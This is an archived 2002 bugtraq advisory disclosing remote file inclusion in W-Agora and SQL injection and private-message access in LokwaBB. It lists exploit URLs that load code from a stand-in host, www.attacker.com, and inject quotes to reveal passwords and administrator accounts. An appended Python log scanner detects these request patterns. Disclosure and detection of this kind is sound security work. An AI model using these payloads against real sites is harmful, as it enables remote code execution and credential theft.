[25697] in bugtraq
Security holes in LokwaBB and W-Agora
daemon@ATHENA.MIT.EDU (Frog Man)
Sat Jun 8 13:42:15 2002
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
Date: Sat, 08 Jun 2002 13:43:21 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F164WirVUCHPW2OXC4O00017bc7@hotmail.com>
Somebody advised me to also post on bugtraq, not only on vuln-dev, so I am
doing so :) I just hope that doesn't give more work to the webmasters.
Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net
Problem :
- Including file
Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt
- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt
- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt
More details in French :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/
Problems :
- XSS
- Private messages reading
- SQL Injection
Exploits :
- http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
- http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]
More details in French :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools
Sorry for my poor English :)
frog-m@n
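An added detection example, not part of the original post: a small access-log scanner that flags the two request shapes reported above, an `inc_dir` value that points off-host and a single quote in the `member` or `loser` parameter. The log format, the sample lines, the host names and the rule labels are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# A value that starts with "scheme://" or "//" points off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

# Parameters named in the advisory and the test applied to each decoded value.
# The quote test is deliberately coarse and will also flag names like O'Brien.
RULES = {
    "inc_dir": ("remote-include", lambda v: bool(REMOTE.match(v))),
    "member": ("sql-quote", lambda v: "'" in v),
    "loser": ("sql-quote", lambda v: "'" in v),
}

# Request field of a common/combined log format line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines using documentation addresses and host names.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2002:13:50:01 +0200] "GET /include/mysql.php'
    '?inc_dir=http://files.example&ext=txt HTTP/1.0" 200 512',
    '192.0.2.10 - - [08/Jun/2002:13:50:09 +0200] "GET /member.php'
    '?action=viewpro&member=%27%20OR%20status=%27Administrator HTTP/1.0" 200 2048',
    '192.0.2.44 - - [08/Jun/2002:13:51:30 +0200] "GET /member.php'
    '?action=viewpro&member=alice HTTP/1.0" 200 1900',
    '192.0.2.44 - - [08/Jun/2002:13:51:42 +0200] "GET /index.php'
    '?inc_dir=include HTTP/1.0" 200 900',
]

def scan_line(line):
    """Return a list of (rule, parameter, decoded value) hits for one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    hits = []
    # parse_qsl percent-decodes, so %27 and http%3A%2F%2F are matched as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        rule = RULES.get(name.lower())
        if rule and rule[1](value):
            hits.append((rule[0], name, value))
    return hits

def scan_log(lines):
    """Return (line number, rule, parameter, value) for every hit."""
    return [(n, *hit) for n, line in enumerate(lines, 1) for hit in scan_line(line)]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only query strings are inspected, so parameters sent in a POST body do not appear unless the server logs them.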